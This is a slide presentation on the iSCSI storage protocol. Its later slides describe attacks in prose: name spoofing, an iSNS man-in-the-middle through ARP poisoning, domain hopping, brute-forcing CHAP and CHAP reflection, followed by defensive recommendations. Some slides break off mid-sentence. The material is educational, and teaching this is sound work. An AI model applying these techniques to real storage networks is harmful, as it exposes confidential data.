ISCSI A repeat of Ben’s presentation

ISCSI
A repeat of Ben’s presentation
WHAT IS ISCSI?
• Internet Small Computer System Interface
• A protocol that carries SCSI commands
over IP networks
• Developed by IBM and Cisco in 1998
• A lower-cost alternative to Fibre Channel
in SANs
STORAGE AREA NETWORKS
• Traditionally, servers would have their
own directly attached storage and
backup. This only works for small
networks in a single location.
• A Storage Area Network introduces
centralized storage and backup,
which works better in large networks
that are geographically dispersed.
• The key to making a SAN work is the
network. Because all the servers are
dependent on the centralized storage,
FIBRE CHANNEL
• Classic SANs use Fibre Channel to connect
the servers to the centralized storage.
• The advantage of Fibre Channel was the
increased performance over TCP – 2 Gbps vs
100 Mbps at the time of introduction.
• The disadvantage of Fibre Channel is the cost
– it requires expensive specialized hardware
and cabling.
ETHERNET CAUGHT UP
Year
Ethernet speed
Fibre Channel speed
2001
100 Mbps
2 Gbps
2005
1 Gbps
4 Gbps
2008
10 Gbps
8 Gbps
2011
100 Gbps
16 Gbps
2014
400 Gbps
32 Gbps
ISCSI VS FIBRE CHANNEL
• iSCSI has a lower implementation cost because it can
be run over regular TCP networks. Fibre Channel requires
expensive specialized hardware.
• Fibre Channel used to be favored for SANs because of
the greater performance, but Ethernet is capable of
faster speeds now.
• iSCSI runs on the same network as the rest of the
business, while Fibre Channel runs on a separate
network. This increases the reliability and speed of Fibre
HOW ISCSI WORKS
1 = Initiator
Target
2 = Encapsulation
3=
ISCSI NAMES
• Both targets and initiators require names for the purpose of
identification. Additionally, names allow for iSCSI storage to be
managed regardless of address.
• iSCSI names must be unique, and because iSCSI can be routed the
name format is made to be worldwide unique.
• Names are associated with iSCSI nodes.
• iSCSI names are permanent and they are not dependent on address.
ISCSI NAME EXAMPLES
Type: IQN or EUI
Date: This date must be
a date during which the
naming authority
owned the domain
name used in this
format
Auth: The reversed
domain name of the
person or organization
creating this iSCSI name
Optional colon-prefixed
string with the character
set and length
boundaries that the
creator deems
appropriate.
ISCSI PDU
• iSCSI defines its own packets that are referred to as iSCSI
Protocol Data Units (PDUs).
• iSCSI PDUs consist of a header and possibly data, where the
data length is specified in the header.
• An iSCSI PDU is sent as the content of one or more TCP
packets.
ISCSI SESSION TYPES
• iSCSI defines two types of sessions:
1. Normal operational sessions
2. Discovery-sessions – These are only used for the
discovery of iSCSI targets
• The session type is defined during the login phase.
NORMAL OPERATIONAL SESSIONS
• Normal operational sessions have two phases:
1. The login phase
2. The full feature phase
• The login phase provides basic security to the iSCSI protocol. It
has to be successfully completed before the session can go into
the full feature phase.
• The full feature phase is where data transfer occurs.
• A session can consist of multiple TCP connections.
ISCSI SIMPLE NAME SERVICE
• iSNS is software that runs on an operating system or iSCSI device
• Both initiators and targets register with the iSNS server
• Responsible for:
• Informing iSCSI clients about which targets are available on the
network
• Grouping iSCSI clients to their correct domain set
• Informing clients about what security aspects – if any – they must
use to associate to targets
ISCSI SIMPLE NAME SERVICE
ISCSI ERROR DETECTION
• Traditional SCSI operations are assumed to be virtually errorfree, because direct-attached SCSI devices share a
dedicated parallel bus connection, isolated from network
disruptions.
• iSCSI operates over the network, possibly including the
Internet. iSCSI needs to be able to deal with disruptions
caused by this inherently unreliable network infrastructure.
• Both initiators and targets are able to buffer commands until
they are acknowledge. For instance, if the initiator wishes to
write to the target it keeps the command data in its buffer
ERROR CORRECTION LEVELS
• Detection and recovery within an iSCSI task – for instance
retransmission of a missing or corrupt PDU
• TCP connection that carries a task may experience errors. Recovery is
attempted through a command restart.
• iSCSI session itself may fail. This means aborting all existing TCP
connections for that session, aborting all queued tasks and
outstanding commands, and restarting the session through the login
phase. This only happens if all other methods of error correction have
failed.
ISCSI SECURITY ISSUES
• The compromise of a single iSCSI device equates to the
compromise of several (10 to 100) operating systems at
once.
• Who cares about admin passwords and root access
when the entire data store can be compromised?
TRUSTING INTERNAL PARTIES
• Vendors have this to say about iSCSI security:
• “An iSCSI SAN uses Gigabit Ethernet, a switched
network with a point-to-point architecture that
makes it nearly impossible to snoop or hijack
packet unless you have physical access to the
network or switches”
• This implies that all internal parties should be trusted,
including employees, vendors, business partners,
guests, contractors, etc.
TOP ISCSI SECURITY ISSUES
1. iSCSI names are trusted
2. iSCSI authorization is the only required security mechanism, and it relies on
iSCSI names.
3. iSCSI authentication is disabled by default
4. Even when iSCSI authentication is turned on, it relies on CHAP – a fairly
weak authentication protocol
5. iSNS servers are not protected
6. iSCSI is a clear-text protocol, unless IPSec encryption is used. This is rarely
done.
AUTHORIZATION ATTACK
• iSCSI names go over the network in clear-text
• They are easy to sniff, guess, or enumerate
• The attacker spoofs his or her iSCSI name and establishes a
connection with an iSCSI target
• Since an iSCSI session often consists of multiple TCP
connections, nothing suspicious is detected and the
attacker instantly gets access to possibly confidential data
ISCSI SIMPLE NAME SERVER ISSUES
• A newly registered iSCSI name will be placed in the default
domain set.
• Any member of the domain set will be able to enumerate or
access the other nodes in the same domain set
• These other nodes can now be used for iQN spoofing
attacks.
• Moving iSCSI nodes out of the default domain set and into
custom domain sets is an important security mechanism, but
ISNS MAN-IN-THE-MIDDLE
• Attacker can identify iSNS server by scanning for open port
3205 – iSNS port.
• Using ARP poisoning, a fake iSNS server can be created to
replace the real one.
• Attacker can now:
• See all registrations (both targets and clients)
• Modify or change domain sets
• Downgrade domain sets that require security (removing
ISNS MAN-IN-THE-MIDDLE
ISNS DOMAIN HOPPING
• An iSNS server relies on iSCSI names for node identification
• If an attacker simply spoofs his or her iSCSI name to that of
the target, the iSNS server will automatically update and
overwrite the legitimate node’s information with that of the
attacker.
• At minimum: DOS
• At maximum: Allows unauthorized hosts to access targets
in restricted domains.
ISCSI AUTHENTICATION ATTACK
• Again, authentication is an optional
implementation. When enabled, it uses CHAP.
• Vulnerable to a brute-force attack
• Tools are available that automate this process
ISCSI AUTHENTICATION ATTACK
ISCSI MESSAGE REFLECTION
ATTACK
• Attacker requests authentication to an iSCSI target
• Receives CHAP ID and Challenge
• Attacker opens a separate connection to the target and
forces it to authenticate
• RFC states that any iSCSI target must respond to
authentication requests by default
• Attacker receives the correct authentication hash from the
target, and can use it in the first connection to authenticate
ISCSI MESSAGE REFLECTION
ATTACK
ISCSI SECURITY
RECOMMENDATIONS
1. Ensure proper configuration of the iSCSI devices and network
2. Enable mutual authentication, and don’t rely only on CHAP
3. Create multiple discovery domains – only use the default domain set for
random registrations
4. Require iSNS IPSec
5. Enable iSCSI IPsec.